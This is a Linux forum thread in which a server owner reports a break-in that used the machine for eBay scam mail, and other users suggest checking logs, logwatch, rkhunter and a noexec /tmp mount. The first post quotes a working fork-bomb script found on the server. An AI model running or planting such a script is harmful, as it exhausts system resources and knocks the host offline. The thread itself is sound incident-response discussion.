Find the answer to your Linux question:
Results 1 to 6 of 6
I hope someone could give me some pointers, I found several strange files in the /tmp directory, one of the them has the following content, the name of the file ...
Enjoy an ad free experience by logging in. Not a member yet? Register.
  1. #1
    Just Joined!
    Join Date
    Jun 2005
    Posts
    8

    I've been hacked!


    I hope someone could give me some pointers, I found several strange files in the /tmp directory, one of the them has the following content, the name of the file is forkbomb.sh
    Code:
    ####################################################################
    # Hello,
    #
    # Welcome to this forkbombing program. This program has the potential
    # to even bring the biggest mainframes to its knees. 
    #
    #####################################################################
    #
    # YOU ARE CRACKED!! THIS PROGRAM WILL KILL YOUR SPAMMING SERVER
    # Your server was sending eBay scam mails because of an IRC botnet
    # server running in /tmp. It is called sess_<something>; the
    # botnet client itself is running in /tmp/sex, and is contained
    # in /tmp/sex3.tgz
    #####################################################################
    #
    # shut things down. 
    #####################################################################
    #
    sh ./forkbomb.sh &
    sh ./forkbomb.sh &
    sh ./forkbomb.sh &
    sh ./forkbomb.sh &
    sh ./forkbomb.sh &
    sh ./forkbomb.sh &
    sh ./forkbomb.sh &
    sh ./forkbomb.sh &
    sh ./forkbomb.sh &
    sh ./forkbomb.sh &
    sh ./forkbomb.sh &
    sh ./forkbomb.sh &
    sh ./forkbomb.sh &
    sh ./forkbomb.sh &
    sh ./forkbomb.sh &
    I noticed that i was getting so many returned emails and I couldn't figure out why. Evidently these scripts were sending ebay scam emails from my server, some of the files are owned by apache and some by root, can someone tell me how they broke into my system, so I can protect myself? I am running a dns, web, mysql and sendmail server and I hope my customer information has not been compromised...
    I don't mind reinstalling the system I have backups of all the information but I would like to know what I was doing wrong. There is another perl script that I cannot determine exactly everything that was being done I do not want to post it here because the code is a lot, if someone wants to take a look please let me know.

    I would like to find out at what extend my system was damaged or compromised, can someone help?

    Thank you guys.

  2. #2
    Linux Guru kkubasik's Avatar
    Join Date
    Mar 2004
    Location
    Lat: 39:03:51N Lon: 77:14:37W
    Posts
    2,396
    First and most important step, view the /etc/passwd file and look for any suspicious users. Change all your passwords, and (if you have backups) removing users who you think aren't legitament. Look at your logs, if some of the files are owend by apache, its most likely the break-in occured through your webserver. Check the logs in /var/logs (or something similar) and generaly poke around. Some might be so large that itll be close to impossible to manualy look through them all (like httpd.access) but you should be able to get a general idea of where the breakin occured.
    Avoid the Gates of Hell. Use Linux
    A Penny for your Thoughts

    Formerly Known as qub333

  3. #3
    Just Joined!
    Join Date
    Jun 2005
    Posts
    8

    Thank you

    Thank you for responding, I didn't feel comfortable and I went ahead and reinstalled the system again. I am really going to try to pay more attention to the security issues for now on. Thank you.

  4. #4
    Just Joined!
    Join Date
    Jul 2005
    Location
    Carbondale, IL
    Posts
    11
    Use logwatch. It goes through the logs and notices stuff like 403's and stuff from apache. And other logging software like sendmail and your diskspace. It is a good utility. It emails root user what it finds suspicous. I love it.

  5. #5
    Linux Guru bigtomrodney's Avatar
    Join Date
    Nov 2004
    Location
    Ireland
    Posts
    6,127
    Rootkithunter / rkhunter is excellent. At least I think it is, never found a rootkit
    I had a few more attempts at my ssh last night. I opened it for half an hour to test it, had a mate connecting, but someone else tried to get me. Good mind to post their IP up here......

    Nah I'll resist

  6. #6
    Just Joined!
    Join Date
    Jul 2005
    Location
    Inside the Kernel (somewhere)
    Posts
    41
    While rkhunter/rootkithunter/logcheck/chkrootkit are all good, they probably wouldn't have picked this one up. The key here is keeping your public_html software secure, and knowing what it does. In addition, you should (at minimum) have a secure tmp partition, mounted noexec.
    You might also check into mod_security and supportive rules.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •